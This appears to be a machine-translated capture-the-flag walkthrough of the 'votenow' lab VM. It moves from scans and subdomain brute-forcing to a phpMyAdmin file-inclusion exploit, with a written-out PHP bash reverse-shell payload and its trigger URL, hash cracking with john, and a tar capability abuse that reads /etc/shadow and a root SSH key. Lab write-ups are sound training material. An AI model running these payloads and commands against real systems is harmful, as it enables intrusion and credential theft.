Catalog

One 、nmap The host found

Two 、 Port scanning

3、 ... and 、 Service version discovery

Four 、 information gathering

5、 ... and 、 Directory scanning

  6、 ... and 、 Subdomain explosion

7、 ... and 、phpmyadmin

  8、 ... and 、 rebound shell

Nine 、john Of hash It's worth blasting

Ten 、capability

11、 ... and 、tars Raise the right

1. Read /etc/shadow

2. Read the private key file

One 、nmap The host found

Make one based on ping Scan , Others are a little slow

Two 、 Port scanning

3、 ... and 、 Service version discovery

Four 、 information gathering

1. Home page

As for other functions , Source code division , It doesn't have much effect on us .

5、 ... and 、 Directory scanning

Check one by one , No response , The domain name is collected above , Bind domain name , Trying to .

1. Bind domain name

2./config.php.bak

This one has 107B The data of . Under the source code, we found the name of the database , Account and password

  6、 ... and 、 Subdomain explosion

Burst out one database.votenow.local, binding ip, After the visit .

  Find a phpmyadmin The login interface of , Combined with the account and password we found earlier , Sign in phpmyadmin.

7、 ... and 、phpmyadmin

1. View version

、

2. Vulnerability search

There are three loopholes , Let's use 44928.txt The file contains a vulnerability .

3. The contents of the document

First use the database to write files , Then let's use the file to contain the execution file

4. Try

Be careful ： take sessions Change it to session, Otherwise it won't work

Write the domain name in front , Followed by session Just ok 了

  8、 ... and 、 rebound shell

  Log out and log in again to get a new session, The remaining steps are similar to the above

select '<?php system('bash -i >& /dev/tcp/192.168.0.107/8888 0>&1');exit;?>'

http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_t9huqlt16d5655p5mact2saf82in9tq0

Nine 、john Of hash It's worth blasting

stay phpmyadmin We also found a user name and hash value

admin            $2y$12$d/nOEjKNgk/epF2BeAFaMu8hW4ae3JJk8ITyh48q97awT/G7eQ11i

Try blasting

john hash --wordlist=rockyou.txt

Stella

su admin

and python Go back shell

Ten 、capability

1. View with capability Authority

getcap -r / 2>/dev/null

2. Means ：

Permitted

This set defines the upper limit of privileges that a thread can have , yes Inheritable and Effective Superset of sets

Effective

When the kernel checks for privileged operations , Set of actual inspections （ You can add / Delete Effective Medium capabilities, To achieve temporary opening / Function of permission ）

3. Check one by one

Find us admin Commands that users can execute .tars We can execute .

11、 ... and 、tars Raise the right

1. Read /etc/shadow

Read compression

tar -cf archive.tar /etc/shadow

decompression

tar -xf archive.tar

Use the inside root Of hash value , Find a dictionary to touch . Finding the right dictionary should be able to crack it

2. Read the private key file

Same as above tarS To read the file , Then decompress . Put it in admin Of .ssh below , And then through ssh Sign in , Mention right to success

ssh -i id_rsa [email protected] -p 2082

Get flag